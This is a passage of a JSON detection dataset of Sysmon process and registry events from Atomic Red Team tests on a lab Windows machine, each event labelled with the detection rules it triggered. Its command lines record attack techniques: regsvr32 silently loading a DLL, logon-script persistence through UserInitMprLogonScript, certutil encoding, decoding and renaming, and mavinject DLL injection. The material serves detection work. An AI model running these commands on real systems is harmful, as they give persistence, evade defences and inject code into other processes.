14:53:46.135"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4041,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:46.204886Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\syswow64\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8","Image":"C:\\Windows\\SysWOW64\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D97A-5D31-0000-00109DDC3800","ProcessId":3564,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:53:46.831"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4044,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:46.848703Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D97A-5D31-0000-001019DE3800","ProcessId":5828,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:53:46.867"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4045,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:46.893188Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8","Image":"C:\\Windows\\SysWOW64\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-D97A-5D31-0000-001019DE3800","ParentProcessId":5828,"ProcessGuid":"747F3D96-D97B-5D31-0000-00109DEB3800","ProcessId":5788,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:53:47.056"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4047,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:47.083068Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Logon Scripts (UserInitMprLogonScript)"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d \" cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D982-5D31-0000-0010DC633900","ProcessId":4240,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:53:54.968"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4049,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:54.976854Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Logon Scripts (UserInitMprLogonScript)"],"event":{"Event":{"EventData":{"CommandLine":"REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d \" cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D982-5D31-0000-0010DC633900","ParentProcessId":4240,"ProcessGuid":"747F3D96-D983-5D31-0000-00102E663900","ProcessId":3608,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:53:55.010"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4050,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:55.018275Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","OceanLotus Registry Activity","Logon Scripts (UserInitMprLogonScript) Registry","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D983-5D31-0000-00102E663900","ProcessId":3608,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\UserInitMprLogonScript","UtcTime":"2019-07-19 14:54:01.900"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":4051,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:54:01.925833Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -encode c:\\file.exe file.txt\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA3F-5D31-0000-00104C173C00","ProcessId":4832,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.223"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4061,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:03.235828Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"certutil.exe -encode c:\\file.exe file.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -encode c:\\file.exe file.txt\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA3F-5D31-0000-00104C173C00","ParentProcessId":4832,"ProcessGuid":"747F3D96-DA3F-5D31-0000-00109E193C00","ProcessId":1260,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.261"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4062,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:03.309488Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -decode file.txt c:\\file.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA3F-5D31-0000-0010562E3C00","ProcessId":4020,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.786"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4063,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:03.961276Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"certutil.exe -decode file.txt c:\\file.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"certutil.exe -decode file.txt c:\\file.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA3F-5D31-0000-0010562E3C00","ParentProcessId":4020,"ProcessGuid":"747F3D96-DA3F-5D31-0000-001022323C00","ProcessId":6888,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:03.818"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4064,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:03.974754Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Copy From or To System32"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c copy %%windir%%\\\\system32\\\\certutil.exe %%temp%%tcm.tmp\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA40-5D31-0000-00106A543C00","ProcessId":6572,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.236"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4066,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:04.270645Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Copy From or To System32"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /c copy C:\\Windows\\\\system32\\\\certutil.exe C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c copy %windir%\\\\system32\\\\certutil.exe %temp%tcm.tmp\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA40-5D31-0000-00106A543C00","ParentProcessId":6572,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010B1553C00","ProcessId":5168,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.256"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4067,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:04.294575Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c %%temp%%tcm.tmp -decode c:\\file.exe file.txt\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010CF5A3C00","ProcessId":4336,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.316"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4068,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:04.333864Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /c C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe file.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"cmd.exe /c %temp%tcm.tmp -decode c:\\file.exe file.txt\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA40-5D31-0000-0010CF5A3C00","ParentProcessId":4336,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010565D3C00","ProcessId":3932,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.346"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4069,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:04.361122Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe file.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"cmd.exe /c C:\\Users\\IEUser\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe file.txt","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA40-5D31-0000-0010565D3C00","ParentProcessId":3932,"ProcessGuid":"747F3D96-DA40-5D31-0000-0010AB5F3C00","ProcessId":6260,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:04.381"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4070,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:04.412850Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MavInject Process Injection"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\mavinject.exe\" 3912 /INJECTRUNNING C:\\AtomicRedTeam\\atomics\\T1055\\src\\x64\\T1055.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft Application Virtualization Injector","FileVersion":"10.0.17763.1 
